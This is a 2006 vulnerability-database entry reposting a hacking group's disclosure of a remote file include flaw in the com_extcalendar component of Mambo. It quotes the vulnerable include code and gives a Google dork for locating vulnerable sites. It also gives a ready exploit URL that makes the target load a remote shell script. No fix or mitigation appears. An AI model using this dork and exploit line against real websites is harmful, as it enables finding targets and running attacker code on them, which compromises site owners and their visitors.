Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13915
HistoryAug 17, 2006 - 12:00 a.m.

com_extcalendar(extcalendar.php) Remote File Include Vulnerabilities

2006-08-1700:00:00
vulners.com
21

!!!WWW.SiBERSAVASCiLAR.COM!!!

Title : com_extcalendar(extcalendar.php) Remote File Include Vulnerabilities


#Author: Crackers_Child

#cont@ct: [email protected]


Google Dorks : inurl:"/com_extcalendar/"


Application : com_extcalendar Component of Mambo



Bug

in extcalendar.php

global $mosConfig_absolute_path;
require_once( $mosConfig_absolute_path."/components/com_extcalendar/config.inc.php" );
require_once( $CONFIG_EXT['LIB_DIR']."mail.inc.php" );


Exploit:

http://[target]/[mambo_path]/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=Shell.txt?


greets:

X_ALPEREN_X,Root_MOr And All Other Friends


--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------